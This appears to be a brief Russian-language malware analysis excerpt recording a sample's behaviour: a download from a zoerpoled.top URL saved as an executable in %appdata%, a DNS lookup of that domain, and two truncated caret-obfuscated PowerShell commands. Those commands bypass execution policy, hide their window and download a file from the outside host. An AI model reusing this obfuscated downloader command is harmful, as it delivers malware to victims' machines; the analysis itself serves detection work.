Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^W^er^s^H^E^L^L.E^x^e -^execU^T^i^O^nP^olI^CY ^By^Pa^s^S -nO^PrOf^i^l^e -wiN^Do^WstyL^E hiD^den^ ^(NEW^-o^b^jE^Ct^ ^SYS^Tem.^nET^.^WeBcLIeN^T)^.dOWn^l^OAD^fIle(^'http://www.zoerpol...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "Po^W^er^s^H^E^L^L.E^x^e -^execU^T^i^O^nP^olI^CY ^By^Pa^s^S -nO^PrOf^i^l^e -wiN^Do^WstyL^E hiD^den^ ^(NEW^-o^b^jE^Ct^ ^SYS^Tem.^nET^.^WeBcLIeN^T)^.dOWn^l^OAD^fIle(^'http://www.zoerpol...' (со скрытым окном)